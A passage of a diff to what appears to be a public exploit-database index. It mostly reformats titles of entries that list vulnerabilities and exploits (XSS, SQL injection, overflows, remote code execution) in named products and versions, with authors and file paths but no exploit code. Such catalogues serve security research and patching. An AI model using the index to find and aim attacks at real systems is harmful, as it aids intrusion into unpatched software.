38230,platforms/multiple/remote/38230.txt,"Apache OFBiz 10.4.x Multiple Cross-Site Scripting Vulnerabilities",2013-01-18,"Juan Caillava",multiple,remote,0 38231,platforms/php/webapps/38231.txt,"Scripts Genie Classified Ultra - SQL Injection / Cross-Site Scripting",2013-01-20,3spi0n,php,webapps,0 38232,platforms/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility Buffer Overflow",2013-01-21,anonymous,linux,local,0 38233,platforms/hardware/remote/38233.txt,"F5 Networks BIG-IP XML External Entity Injection",2013-01-21,anonymous,hardware,remote,0 38234,platforms/php/webapps/38234.txt,"DigiLIBE Execution-After-Redirect Information Disclosure",2013-01-22,"Robert Gilbert",php,webapps,0 38235,platforms/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",jsp,webapps,0 -38236,platforms/php/webapps/38236.txt,"gpEasy CMS 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 +38236,platforms/php/webapps/38236.txt,"gpEasy CMS - 'section' Parameter Cross-Site Scripting",2013-01-23,"High-Tech Bridge SA",php,webapps,0 38237,platforms/php/webapps/38237.txt,"WordPress Chocolate WP Theme Multiple Security Vulnerabilities",2013-01-23,"Eugene Dokukin",php,webapps,0 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection",2013-01-25,AkaStep,php,webapps,0 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0 @@ -34541,11 +34541,11 @@ id,file,description,date,author,platform,type,port 38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0 38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0 38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,Orwelllabs,hardware,webapps,0 -38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 +38246,platforms/php/webapps/38246.txt,"iCart Pro - 'section' Parameter SQL Injection",2013-01-25,n3tw0rk,php,webapps,0 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure",2013-01-29,"Alejandro Ramos",multiple,remote,0 38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 -38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 +38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 @@ -34585,12 +34585,12 @@ id,file,description,date,author,platform,type,port 38292,platforms/php/webapps/38292.txt,"refbase 0.9.6 - Multiple Vulnerabilities",2015-09-23,"Mohab Ali",php,webapps,0 38294,platforms/php/webapps/38294.txt,"ezStats2 - 'style.php' Local File Inclusion",2013-02-06,L0n3ly-H34rT,php,webapps,0 38295,platforms/php/webapps/38295.txt,"ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter XSS",2013-02-06,L0n3ly-H34rT,php,webapps,0 -38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 +38296,platforms/php/webapps/38296.txt,"WordPress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting",2013-02-06,"High-Tech Bridge",php,webapps,0 38297,platforms/php/webapps/38297.txt,"WordPress Wysija Newsletters Plugin Multiple SQL Injection",2013-02-06,"High-Tech Bridge",php,webapps,0 38298,platforms/linux/local/38298.txt,"xNBD '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",linux,local,0 38299,platforms/windows/local/38299.c,"Symantec Encryption Desktop 10 Local Buffer Overflow Privilege Escalation",2012-02-25,"Nikita Tarakanov",windows,local,0 -38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 -38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 +38300,platforms/php/webapps/38300.txt,"WordPress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting",2013-01-31,hiphop,php,webapps,0 +38301,platforms/php/webapps/38301.txt,"WordPress Pinboard Theme - 'tab' Parameter Cross-Site Scripting",2013-02-09,"Henrique Montenegro",php,webapps,0 38302,platforms/multiple/remote/38302.rb,"w3tw0rk / Pitbul IRC Bot - Remote Code Execution",2015-09-23,Metasploit,multiple,remote,6667 38303,platforms/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Privilege Escalation via DMG Install Script",2015-09-23,"Yorick Koster",osx,local,0 38304,platforms/php/webapps/38304.py,"SMF (Simple Machine Forum) 2.0.10 - Remote Memory Exfiltration Exploit",2015-09-24,"Filippo Roncari",php,webapps,0 @@ -34608,7 +34608,7 @@ id,file,description,date,author,platform,type,port 38317,platforms/windows/dos/38317.txt,"FreshFTP 5.52 - .qfl Crash PoC",2015-09-25,Un_N0n,windows,dos,0 38318,platforms/asp/webapps/38318.txt,"MIMEsweeper For SMTP Multiple Cross-Site Scripting Vulnerabilities",2013-02-18,"Anastasios Monachos",asp,webapps,0 38319,platforms/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,windows,local,0 -38320,platforms/php/webapps/38320.txt,"Squirrelcart 'table' Parameter Cross-Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps,0 +38320,platforms/php/webapps/38320.txt,"Squirrelcart - 'table' Parameter Cross-Site Scripting",2013-02-19,"Gjoko Krstic",php,webapps,0 38321,platforms/php/webapps/38321.txt,"X2Engine 4.2 - CSRF",2015-09-25,Portcullis,php,webapps,80 38322,platforms/php/webapps/38322.txt,"CKEditor 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,php,webapps,0 38323,platforms/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,php,webapps,80 @@ -34616,7 +34616,7 @@ id,file,description,date,author,platform,type,port 38325,platforms/windows/remote/38325.txt,"Alt-N MDaemon WorldClient And WebAdmin Cross Site Request Forgery",2013-02-18,QSecure,windows,remote,0 38326,platforms/php/webapps/38326.txt,"Zenphoto - 'index.php' SQL Injection",2013-02-20,HosseinNsn,php,webapps,0 38327,platforms/php/webapps/38327.txt,"PHPmyGallery 1.5 - Local File Disclosure / Cross-Site Scripting",2013-02-21,TheMirkin,php,webapps,0 -38328,platforms/php/webapps/38328.txt,"OpenEMR 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 +38328,platforms/php/webapps/38328.txt,"OpenEMR - 'site' Parameter Cross-Site Scripting",2013-02-21,"Gjoko Krstic",php,webapps,0 38329,platforms/php/webapps/38329.txt,"ZeroClipboard 1.9.x - 'id' Parameter Cross-Site Scripting",2013-02-20,MustLive,php,webapps,0 38330,platforms/windows/remote/38330.txt,"Photodex ProShow Producer Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-02-23,"Julien Ahrens",windows,remote,0 38331,platforms/php/webapps/38331.txt,"WordPress Smart Flv Plugin 'jwplayer.swf' Multiple Cross-Site Scripting Vulnerabilities",2013-02-25,"Henri Salo",php,webapps,0 @@ -34643,11 +34643,11 @@ id,file,description,date,author,platform,type,port 38352,platforms/windows/remote/38352.rb,"ManageEngine EventLog Analyzer Remote Code Execution",2015-09-29,Metasploit,windows,remote,8400 38353,platforms/linux/local/38353.txt,"Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation",2015-09-29,halfdog,linux,local,0 38354,platforms/php/webapps/38354.txt,"Plogger Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0 -38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 +38355,platforms/php/webapps/38355.txt,"WordPress Uploader Plugin - 'blog' Parameter Cross-Site Scripting",2013-03-01,CodeV,php,webapps,0 38356,platforms/hardware/remote/38356.txt,"Foscam Prior to 11.37.2.49 Directory Traversal",2013-03-01,"Frederic Basse",hardware,remote,0 38357,platforms/linux/local/38357.c,"rpi-update Insecure Temporary File Handling and Security Bypass Vulnerabilities",2013-02-28,Technion,linux,local,0 38358,platforms/java/webapps/38358.txt,"HP Intelligent Management Center 'topoContent.jsf' Cross-Site Scripting",2013-03-04,"Julien Ahrens",java,webapps,0 -38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 +38359,platforms/php/webapps/38359.txt,"WordPress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting",2013-03-05,alejandr0.m0f0,php,webapps,0 38360,platforms/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Local Root Exploit",2015-09-30,cenobyte,osx,local,0 38402,platforms/multiple/remote/38402.rb,"Zemra Botnet CnC Web Panel Remote Code Execution",2015-10-05,Metasploit,multiple,remote,0 38401,platforms/windows/remote/38401.rb,"Kaseya Virtual System Administrator (VSA) - uploader.aspx Arbitrary File Upload",2015-10-05,Metasploit,windows,remote,0 @@ -34665,7 +34665,7 @@ id,file,description,date,author,platform,type,port 38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection",2013-03-08,"Aditya Balapure",php,webapps,0 38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross-Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics - 'warning' Parameter Cross-Site Scripting",2013-03-10,"Manuel García Cárdenas",php,webapps,0 -38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 +38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin - 'playerID' Parameter Cross-Site Scripting",2013-03-11,hiphop,php,webapps,0 38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0 38379,platforms/windows/webapps/38379.txt,"FTGate 2009 Build 6.4.00 - Multiple Vulnerabilities",2015-10-02,hyp3rlinx,windows,webapps,0 38380,platforms/windows/webapps/38380.txt,"FTGate 7 - CSRF",2015-10-02,hyp3rlinx,windows,webapps,0 @@ -34693,16 +34693,16 @@ id,file,description,date,author,platform,type,port 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack-Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - RCE Through File Upload Filter Bypass",2015-10-06,"Raffaele Forte",php,webapps,0 -38408,platforms/php/webapps/38408.txt,"Jaow CMS 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 +38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 38411,platforms/python/webapps/38411.txt,"Zope Management Interface 4.3.7 - CSRF",2015-10-07,hyp3rlinx,python,webapps,0 38412,platforms/multiple/remote/38412.txt,"IBM Lotus Domino 8.5.x - 'x.nsf' Multiple Cross-Site Scripting Vulnerabilities",2013-03-26,MustLive,multiple,remote,0 38413,platforms/php/webapps/38413.txt,"OrionDB Web Directory Multiple Cross-Site Scripting Vulnerabilities",2013-03-27,3spi0n,php,webapps,0 -38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 +38414,platforms/php/webapps/38414.txt,"WordPress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting",2013-03-30,"Stefan Schurtz",php,webapps,0 38415,platforms/asp/webapps/38415.txt,"C2 WebResource - 'File' Parameter Cross-Site Scripting",2013-04-03,anonymous,asp,webapps,0 38416,platforms/php/webapps/38416.txt,"e107 - 'content_preset.php' Cross-Site Scripting",2013-04-03,"Simon Bieber",php,webapps,0 -38417,platforms/php/webapps/38417.txt,"Symphony 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 +38417,platforms/php/webapps/38417.txt,"Symphony - 'sort' Parameter SQL Injection",2013-04-03,"High-Tech Bridge",php,webapps,0 38418,platforms/php/webapps/38418.txt,"FUDforum Multiple Remote PHP Code Injection Vulnerabilities",2013-04-03,"High-Tech Bridge",php,webapps,0 38419,platforms/windows/dos/38419.txt,"SmallFTPD Unspecified Denial of Service",2013-04-03,AkaStep,windows,dos,0 38420,platforms/multiple/dos/38420.txt,"Google Chrome Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 @@ -34724,9 +34724,9 @@ id,file,description,date,author,platform,type,port 38436,platforms/php/webapps/38436.txt,"Zimbra 'aspell.php' Cross-Site Scripting",2013-04-05,"Michael Scherer",php,webapps,0 38437,platforms/hardware/remote/38437.txt,"Multiple Foscam IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-04-09,shekyan,hardware,remote,0 38438,platforms/php/webapps/38438.txt,"EasyPHP 'index.php' Authentication Bypass and Remote PHP Code Injection",2013-04-09,KedAns-Dz,php,webapps,0 -38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 +38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting",2013-04-09,Beni_Vanda,php,webapps,0 38440,platforms/php/webapps/38440.txt,"phpMyAdmin - 'tbl_gis_visualization.php' Multiple Cross-Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0 -38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 +38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin - 'playlist_id' Parameter SQL Injection",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0 38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - DoS",2015-10-11,"Aria Akhavan Rezayat",php,dos,0 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 @@ -34741,8 +34741,8 @@ id,file,description,date,author,platform,type,port 38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0 38476,platforms/php/webapps/38476.txt,"Todoo Forum 2.0 todooforum.php Multiple Parameter XSS",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 38477,platforms/php/webapps/38477.txt,"Todoo Forum 2.0 todooforum.php Multiple Parameter SQL Injection",2013-04-14,"Chiekh Bouchenafa",php,webapps,0 -38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 -38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection",2013-04-11,cheki,php,webapps,0 +38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin - 'theme' Parameter SQL Injection",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0 +38459,platforms/php/webapps/38459.txt,"Request Tracker - 'ShowPending' Parameter SQL Injection",2013-04-11,cheki,php,webapps,0 38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0 38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0 38460,platforms/jsp/webapps/38460.txt,"jPlayer 'Jplayer.swf' Script Cross-Site Scripting",2013-03-29,"Malte Batram",jsp,webapps,0 @@ -34760,7 +34760,7 @@ id,file,description,date,author,platform,type,port 38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0 38478,platforms/php/webapps/38478.txt,"Sosci Survey Multiple Security Vulnerabilities",2013-04-17,"T. Lazauninkas",php,webapps,0 38479,platforms/asp/webapps/38479.txt,"Matrix42 Service Store 'default.aspx' Cross-Site Scripting",2013-03-06,43zsec,asp,webapps,0 -38480,platforms/php/webapps/38480.txt,"Fork CMS 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 +38480,platforms/php/webapps/38480.txt,"Fork CMS - 'file' Parameter Local File Inclusion",2013-04-18,"Rafay Baloch",php,webapps,0 38481,platforms/hardware/remote/38481.html,"D-Link DIR-865L Cross Site Request Forgery",2013-04-19,"Jacob Holcomb",hardware,remote,0 38482,platforms/php/webapps/38482.txt,"Crafty Syntax Live Help 3.1.2 - Remote File Inclusion / Path Disclosure",2013-04-19,ITTIHACK,php,webapps,0 38483,platforms/hardware/dos/38483.txt,"TP-LINK TL-WR741N and TL-WR741ND Routers Multiple Denial of Service Vulnerabilities",2013-04-19,W1ckerMan,hardware,dos,0 @@ -34795,10 +34795,10 @@ id,file,description,date,author,platform,type,port 38512,platforms/windows/remote/38512.php,"The World Browser 3.0 Final - Remote Code Execution",2015-10-22,"Ehsan Noreddini",windows,remote,0 38513,platforms/windows/remote/38513.txt,"TeamSpeak Client 3.0.18.1 - RFI to RCE Exploit",2015-10-22,Scurippio,windows,remote,0 38514,platforms/hardware/webapps/38514.py,"Beckhoff CX9020 CPU Module - Remote Code Execution Exploit",2015-10-22,Photubias,hardware,webapps,0 -38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 -38516,platforms/php/webapps/38516.txt,"Open Flash Chart 'get-data' Parameter Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 +38515,platforms/php/webapps/38515.txt,"WordPress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download",2013-05-15,ByEge,php,webapps,0 +38516,platforms/php/webapps/38516.txt,"Open Flash Chart - 'get-data' Parameter Cross-Site Scripting",2013-05-14,"Deepankar Arora",php,webapps,0 38517,platforms/php/webapps/38517.html,"WordPress Mail On Update Plugin Cross Site Request Forgery",2013-05-16,"Henri Salo",php,webapps,0 -38518,platforms/php/webapps/38518.txt,"Jojo CMS 'search' Parameter Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 +38518,platforms/php/webapps/38518.txt,"Jojo CMS - 'search' Parameter Cross-Site Scripting",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38519,platforms/php/webapps/38519.txt,"Jojo CMS - 'X-Forwarded-For' HTTP header SQL Injection",2013-05-15,"High-Tech Bridge SA",php,webapps,0 38520,platforms/php/webapps/38520.html,"WordPress WP Cleanfix Plugin Cross Site Request Forgery",2013-05-16,"Enigma Ideas",php,webapps,0 38521,platforms/multiple/remote/38521.c,"Python RRDtool Module Function Format String",2013-05-18,"Thomas Pollet",multiple,remote,0 @@ -34843,7 +34843,7 @@ id,file,description,date,author,platform,type,port 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38567,platforms/php/webapps/38567.txt,"Max Forum Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0 -38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 +38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme - 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 38569,platforms/php/webapps/38569.txt,"Lokboard 'index_4.php' PHP Code Injection",2013-06-10,"CWH Underground",php,webapps,0 38570,platforms/php/webapps/38570.txt,"ScriptCase 'scelta_categoria.php' SQL Injection",2013-06-10,"Hossein Hezami",php,webapps,0 38571,platforms/php/webapps/38571.txt,"mkCMS 'index.php' Arbitrary PHP Code Execution",2013-06-11,"CWH Underground",php,webapps,0 @@ -34860,7 +34860,7 @@ id,file,description,date,author,platform,type,port 38583,platforms/hardware/remote/38583.html,"Sony CH and DH Series IP Cameras Multiple Cross Site Request Forgery Vulnerabilities",2013-06-12,Castillo,hardware,remote,0 38584,platforms/hardware/remote/38584.txt,"Grandstream Multiple IP Cameras Cross Site Request Forgery",2013-06-12,Castillo,hardware,remote,0 38585,platforms/php/webapps/38585.pl,"WordPress NextGEN Gallery Plugin - 'upload.php' Arbitrary File Upload",2013-06-12,"Marcos Garcia",php,webapps,0 -38586,platforms/android/remote/38586.txt,"TaxiMonger for Android 'name' Parameter HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 +38586,platforms/android/remote/38586.txt,"TaxiMonger for Android - 'name' Parameter HTML Injection",2013-06-15,"Ismail Kaleem",android,remote,0 38587,platforms/multiple/remote/38587.txt,"Monkey HTTP Daemon Mandril Security Plugin Security Bypass",2013-06-14,felipensp,multiple,remote,0 38588,platforms/php/webapps/38588.php,"bloofoxCMS 'index.php' Arbitrary File Upload",2013-06-17,"CWH Underground",php,webapps,0 38589,platforms/linux/dos/38589.c,"Linux Kernel 3.0.5 - 'test_root()' Function Local Denial of Service",2013-06-05,"Jonathan Salwan",linux,dos,0 @@ -34872,7 +34872,7 @@ id,file,description,date,author,platform,type,port 38595,platforms/multiple/dos/38595.txt,"Oracle VM VirtualBox 4.0 - 'tracepath' Local Denial of Service",2013-06-26,"Thomas Dreibholz",multiple,dos,0 38596,platforms/php/webapps/38596.txt,"Xaraya - Multiple Cross-Site Scripting Vulnerabilities",2013-06-26,"High-Tech Bridge",php,webapps,0 38597,platforms/multiple/remote/38597.txt,"Motion Multiple Remote Security Vulnerabilities",2013-06-26,xistence,multiple,remote,0 -38598,platforms/php/webapps/38598.txt,"ZamFoo 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 +38598,platforms/php/webapps/38598.txt,"ZamFoo - 'date' Parameter Remote Command Injection",2013-06-15,localhost.re,php,webapps,0 38599,platforms/win_x86/remote/38599.py,"Symantec pcAnywhere 12.5.0 Windows x86 - Remote Code Execution",2015-11-02,"Tomislav Paskalev",win_x86,remote,0 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - (Crawl website) Buffer OverFlow",2015-11-02,MandawCoder,windows,local,0 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - (Scan Addresses) Buffer Overflow Exploit",2015-11-02,VIKRAMADITYA,windows,local,0 @@ -34882,7 +34882,7 @@ id,file,description,date,author,platform,type,port 38605,platforms/php/webapps/38605.txt,"Nameko 'nameko.php' Cross-Site Scripting",2013-06-29,"Andrea Menin",php,webapps,0 38606,platforms/php/webapps/38606.txt,"WordPress WP Private Messages Plugin - 'msgid' Parameter SQL Injection",2013-06-29,"IeDb ir",php,webapps,0 38607,platforms/php/webapps/38607.txt,"Atomy Maxsite 'index.php' Arbitrary File Upload",2013-06-30,Iranian_Dark_Coders_Team,php,webapps,0 -38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 +38608,platforms/php/webapps/38608.txt,"Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38609,platforms/windows/local/38609.py,"Gold MP4 Player - .swf Local Exploit",2015-11-03,"Vivek Mahajan",windows,local,0 38610,platforms/android/dos/38610.txt,"Samsung Galaxy S6 Samsung Gallery - GIF Parsing Crash",2015-11-03,"Google Security Research",android,dos,0 38611,platforms/android/dos/38611.txt,"Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption",2015-11-03,"Google Security Research",android,dos,0 @@ -34900,8 +34900,8 @@ id,file,description,date,author,platform,type,port 38621,platforms/php/webapps/38621.txt,"WordPress Xorbin Digital Flash Clock Plugin - 'widgetUrl' Parameter Cross-Site Scripting",2013-06-30,"Prakhar Prasad",php,webapps,0 38622,platforms/linux/dos/38622.txt,"libvirt 'virConnectListAllInterfaces' Method Denial of Service",2013-07-01,"Daniel P. Berrange",linux,dos,0 38623,platforms/multiple/dos/38623.html,"RealNetworks RealPlayer Denial of Service",2013-07-02,"Akshaysinh Vaghela",multiple,dos,0 -38624,platforms/php/webapps/38624.txt,"WordPress WP Feed Plugin 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 -38625,platforms/php/webapps/38625.txt,"WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38624,platforms/php/webapps/38624.txt,"WordPress WP Feed Plugin - 'nid' Parameter SQL Injection",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 +38625,platforms/php/webapps/38625.txt,"WordPress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting",2013-07-02,"Iranian Exploit DataBase",php,webapps,0 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server Remote Denial of Service",2013-07-01,Chako,multiple,dos,0 38627,platforms/android/remote/38627.sh,"Google Android 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38628,platforms/php/webapps/38628.txt,"HostBill 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 @@ -34944,7 +34944,7 @@ id,file,description,date,author,platform,type,port 38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 38673,platforms/php/webapps/38673.txt,"Collabtive - Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0 -38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 +38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 38677,platforms/php/webapps/38677.txt,"VBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 @@ -35012,17 +35012,17 @@ id,file,description,date,author,platform,type,port 38741,platforms/linux/remote/38741.txt,"Nmap Arbitrary File Write",2013-08-06,"Piotr Duszynski",linux,remote,0 38742,platforms/windows/remote/38742.txt,"Aloaha PDF Suite Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote,0 38744,platforms/php/webapps/38744.txt,"appRain CMF Multiple Cross Site Request Forgery Vulnerabilities",2013-08-29,"Yashar shahinzadeh",php,webapps,0 -38745,platforms/php/webapps/38745.txt,"Xibo 'layout' Parameter HTML Injection",2013-08-21,"Jacob Holcomb",php,webapps,0 +38745,platforms/php/webapps/38745.txt,"Xibo - 'layout' Parameter HTML Injection",2013-08-21,"Jacob Holcomb",php,webapps,0 38746,platforms/php/webapps/38746.html,"Xibo Cross Site Request Forgery",2013-08-21,"Jacob Holcomb",php,webapps,0 38747,platforms/windows/dos/38747.py,"Pwstore Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos,0 38748,platforms/php/webapps/38748.txt,"dBlog CMS - 'm' Parameter 